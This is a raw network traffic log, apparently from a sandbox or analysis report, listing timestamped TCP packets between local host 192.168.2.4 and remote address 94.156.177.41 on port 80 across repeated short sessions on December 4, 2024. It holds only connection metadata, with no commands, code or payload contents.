Dec 4, 2024 06:53:02.357311964 CET	49792	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:02.477225065 CET	80	49792	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:02.477302074 CET	49792	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:02.597213984 CET	80	49792	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:04.008790970 CET	80	49792	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:04.008958101 CET	80	49792	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:04.009006977 CET	49792	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:04.009735107 CET	49792	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:04.129570961 CET	80	49792	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:04.158612967 CET	49793	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:04.279284000 CET	80	49793	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:04.279357910 CET	49793	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:04.281270027 CET	49793	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:04.401149035 CET	80	49793	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:04.401220083 CET	49793	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:04.521131039 CET	80	49793	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:05.702600956 CET	80	49793	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:05.702681065 CET	80	49793	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:05.702694893 CET	49793	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:05.702723980 CET	49793	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:05.822696924 CET	80	49793	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:05.853130102 CET	49799	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:05.973126888 CET	80	49799	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:05.973239899 CET	49799	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:05.975161076 CET	49799	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:06.095860004 CET	80	49799	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:06.095983982 CET	49799	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:06.216007948 CET	80	49799	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:07.476594925 CET	80	49799	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:07.476612091 CET	80	49799	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:07.476672888 CET	49799	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:07.476700068 CET	49799	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:07.596716881 CET	80	49799	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:07.609563112 CET	49805	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:07.729655027 CET	80	49805	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:07.729832888 CET	49805	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:07.731486082 CET	49805	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:07.851361036 CET	80	49805	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:07.851505995 CET	49805	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:07.971525908 CET	80	49805	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:09.330075979 CET	80	49805	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:09.330216885 CET	49805	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:09.330221891 CET	80	49805	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:09.330271006 CET	49805	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:09.450202942 CET	80	49805	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:09.470818043 CET	49811	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:09.590816021 CET	80	49811	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:09.590913057 CET	49811	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:09.593000889 CET	49811	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:09.712934971 CET	80	49811	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:09.713035107 CET	49811	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:09.833136082 CET	80	49811	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:11.164197922 CET	80	49811	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:11.164303064 CET	49811	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:11.164355993 CET	80	49811	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:11.164410114 CET	49811	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:11.284230947 CET	80	49811	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:11.301261902 CET	49816	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:11.515399933 CET	80	49816	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:11.515491962 CET	49816	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:11.517294884 CET	49816	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:11.637249947 CET	80	49816	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:11.637326956 CET	49816	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:11.757307053 CET	80	49816	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:12.980808020 CET	80	49816	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:12.980824947 CET	80	49816	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:12.980892897 CET	49816	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:12.980931997 CET	49816	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:13.101166010 CET	80	49816	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:13.128788948 CET	49818	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:13.248812914 CET	80	49818	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:13.248989105 CET	49818	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:13.250663042 CET	49818	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:13.370671988 CET	80	49818	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:13.370848894 CET	49818	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:13.490883112 CET	80	49818	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:14.867993116 CET	80	49818	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:14.868073940 CET	80	49818	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:14.868129015 CET	49818	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:14.871534109 CET	49818	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:14.988013983 CET	80	49818	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:15.002449989 CET	49824	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:15.122490883 CET	80	49824	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:15.122740030 CET	49824	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:15.124722958 CET	49824	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:15.244575024 CET	80	49824	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:15.244854927 CET	49824	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:15.364810944 CET	80	49824	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:16.678155899 CET	80	49824	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:16.678277969 CET	49824	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:16.678369045 CET	80	49824	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:16.678420067 CET	49824	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:16.798129082 CET	80	49824	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:16.814908981 CET	49829	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:16.934895992 CET	80	49829	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:16.935014963 CET	49829	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:16.937107086 CET	49829	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:17.057224989 CET	80	49829	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:17.057306051 CET	49829	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:17.177444935 CET	80	49829	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:18.586366892 CET	80	49829	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:18.586385012 CET	80	49829	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:18.586498022 CET	49829	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:18.586548090 CET	49829	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:18.706547976 CET	80	49829	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:18.723432064 CET	49834	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:18.843453884 CET	80	49834	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:18.843539000 CET	49834	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:18.845488071 CET	49834	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:18.965456963 CET	80	49834	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:18.965517998 CET	49834	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:19.085544109 CET	80	49834	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:20.454266071 CET	80	49834	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:20.454452038 CET	80	49834	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:20.454492092 CET	49834	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:20.455550909 CET	49834	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:20.574451923 CET	80	49834	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:20.597234011 CET	49841	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:20.719364882 CET	80	49841	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:20.719460011 CET	49841	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:20.721347094 CET	49841	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:20.841284037 CET	80	49841	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:20.841367006 CET	49841	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:20.961318016 CET	80	49841	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:22.119246960 CET	80	49841	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:22.119369984 CET	49841	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:22.119648933 CET	80	49841	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:22.119700909 CET	49841	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:22.239334106 CET	80	49841	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:22.251668930 CET	49845	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:22.371680021 CET	80	49845	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:22.371786118 CET	49845	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:22.373765945 CET	49845	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:22.493670940 CET	80	49845	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:22.493731976 CET	49845	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:22.614712000 CET	80	49845	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:23.990828991 CET	80	49845	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:23.990953922 CET	49845	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:23.991003036 CET	80	49845	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:23.991132975 CET	49845	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:24.111121893 CET	80	49845	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:24.127145052 CET	49850	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:24.247111082 CET	80	49850	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:24.247221947 CET	49850	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:24.249197006 CET	49850	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:24.369081020 CET	80	49850	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:24.369184971 CET	49850	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:24.489073038 CET	80	49850	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:25.847604990 CET	80	49850	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:25.847616911 CET	80	49850	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:25.847762108 CET	49850	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:25.847794056 CET	49850	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:25.967803955 CET	80	49850	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:25.987731934 CET	49855	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:26.107779026 CET	80	49855	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:26.107836008 CET	49855	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:26.109890938 CET	49855	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:26.229809046 CET	80	49855	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:26.229897976 CET	49855	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:26.349842072 CET	80	49855	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:27.716058969 CET	80	49855	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:27.716188908 CET	80	49855	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:27.716217041 CET	49855	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:27.716248989 CET	49855	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:27.836168051 CET	80	49855	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:27.867276907 CET	49861	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:27.987260103 CET	80	49861	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:27.987513065 CET	49861	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:27.989603996 CET	49861	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:28.109653950 CET	80	49861	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:28.109935999 CET	49861	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:28.230021000 CET	80	49861	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:29.409584045 CET	80	49861	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:29.409653902 CET	80	49861	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:29.409694910 CET	49861	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:29.409725904 CET	49861	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:29.529650927 CET	80	49861	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:29.562490940 CET	49866	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:29.682400942 CET	80	49866	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:29.682501078 CET	49866	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:29.684309006 CET	49866	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:29.804421902 CET	80	49866	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:29.804558992 CET	49866	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:29.924530029 CET	80	49866	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:31.273389101 CET	80	49866	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:31.273514986 CET	49866	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:31.273643017 CET	80	49866	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:31.273694992 CET	49866	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:31.393431902 CET	80	49866	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:31.411811113 CET	49871	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:31.531987906 CET	80	49871	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:31.534580946 CET	49871	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:31.536389112 CET	49871	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:31.656280041 CET	80	49871	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:31.659621954 CET	49871	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:31.779567957 CET	80	49871	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:33.162556887 CET	80	49871	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:33.162569046 CET	80	49871	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:33.162635088 CET	49871	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:33.162669897 CET	49871	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:33.282609940 CET	80	49871	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:33.301026106 CET	49875	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:33.421021938 CET	80	49875	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:33.421092987 CET	49875	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:33.423110962 CET	49875	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:33.543073893 CET	80	49875	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:33.543134928 CET	49875	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:33.663167000 CET	80	49875	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:35.092927933 CET	80	49875	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:35.093074083 CET	80	49875	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:35.093147993 CET	49875	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:35.093185902 CET	49875	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:35.213126898 CET	80	49875	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:35.460803032 CET	49881	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:35.580873013 CET	80	49881	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:35.580961943 CET	49881	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:35.600054026 CET	49881	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:35.720101118 CET	80	49881	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:35.720159054 CET	49881	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:35.840141058 CET	80	49881	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:37.030312061 CET	80	49881	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:37.030431986 CET	80	49881	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:37.030637026 CET	49881	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:37.030700922 CET	49881	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:37.150752068 CET	80	49881	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:37.175308943 CET	49886	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:37.295325994 CET	80	49886	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:37.295399904 CET	49886	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:37.297369957 CET	49886	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:37.417256117 CET	80	49886	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:37.417337894 CET	49886	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:37.537616014 CET	80	49886	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:38.846515894 CET	80	49886	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:38.846632004 CET	80	49886	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:38.846752882 CET	49886	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:38.846752882 CET	49886	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:38.966713905 CET	80	49886	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:38.988174915 CET	49891	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:39.108330011 CET	80	49891	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:39.108412981 CET	49891	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:39.110398054 CET	49891	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:39.230375051 CET	80	49891	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:39.230432987 CET	49891	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:39.350392103 CET	80	49891	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:40.713646889 CET	80	49891	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:40.713733912 CET	80	49891	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:40.713774920 CET	49891	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:40.715626001 CET	49891	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:40.833744049 CET	80	49891	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:40.848094940 CET	49896	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:40.968121052 CET	80	49896	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:40.968238115 CET	49896	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:40.970338106 CET	49896	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:41.090244055 CET	80	49896	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:41.090316057 CET	49896	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:41.210215092 CET	80	49896	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:42.517138004 CET	80	49896	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:42.517301083 CET	80	49896	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:42.517334938 CET	49896	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:42.517405987 CET	49896	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:42.637348890 CET	80	49896	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:42.691662073 CET	49902	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:42.811647892 CET	80	49902	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:42.811748981 CET	49902	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:42.813740015 CET	49902	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:42.933639050 CET	80	49902	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:42.933722019 CET	49902	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:43.053618908 CET	80	49902	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:44.404247999 CET	80	49902	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:44.404340029 CET	49902	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:44.404350042 CET	80	49902	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:44.404395103 CET	49902	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:44.524266005 CET	80	49902	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:44.550335884 CET	49906	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:44.670272112 CET	80	49906	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:44.670360088 CET	49906	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:44.672182083 CET	49906	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:44.792175055 CET	80	49906	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:44.792351961 CET	49906	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:44.913213968 CET	80	49906	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:46.309767008 CET	80	49906	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:46.309890032 CET	80	49906	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:46.309964895 CET	49906	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:46.311642885 CET	49906	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:46.431533098 CET	80	49906	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:46.461947918 CET	49912	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:46.582015991 CET	80	49912	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:46.583735943 CET	49912	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:46.585800886 CET	49912	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:46.706435919 CET	80	49912	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:46.706490040 CET	49912	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:46.826564074 CET	80	49912	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:48.190813065 CET	80	49912	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:48.190932989 CET	49912	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:48.190974951 CET	80	49912	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:48.191037893 CET	49912	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:48.311014891 CET	80	49912	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:48.328481913 CET	49916	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:48.448434114 CET	80	49916	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:48.448606014 CET	49916	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:48.450506926 CET	49916	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:48.570583105 CET	80	49916	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:48.570672989 CET	49916	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:48.690646887 CET	80	49916	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:50.049144030 CET	80	49916	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:50.049273968 CET	49916	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:50.049289942 CET	80	49916	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:50.049438000 CET	49916	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:50.169203043 CET	80	49916	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:50.191236019 CET	49920	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:50.311161041 CET	80	49920	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:50.311254978 CET	49920	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:50.313322067 CET	49920	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:50.433358908 CET	80	49920	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:50.433425903 CET	49920	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:50.553534985 CET	80	49920	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:51.907574892 CET	80	49920	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:51.907713890 CET	49920	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:51.907804966 CET	80	49920	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:51.907859087 CET	49920	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:52.029212952 CET	80	49920	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:52.048917055 CET	49925	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:52.168911934 CET	80	49925	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:52.169006109 CET	49925	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:52.171034098 CET	49925	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:52.290919065 CET	80	49925	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:52.290981054 CET	49925	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:52.411546946 CET	80	49925	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:53.783016920 CET	80	49925	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:53.783032894 CET	80	49925	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:53.783128023 CET	49925	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:53.783247948 CET	49925	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:53.903101921 CET	80	49925	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:53.921848059 CET	49930	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:54.041788101 CET	80	49930	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:54.041886091 CET	49930	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:54.043678045 CET	49930	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:54.163580894 CET	80	49930	94.156.177.41	192.168.2.4
Dec 4, 2024 06:53:54.163772106 CET	49930	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:53:54.283730030 CET	80	49930	94.156.177.41	192.168.2.4
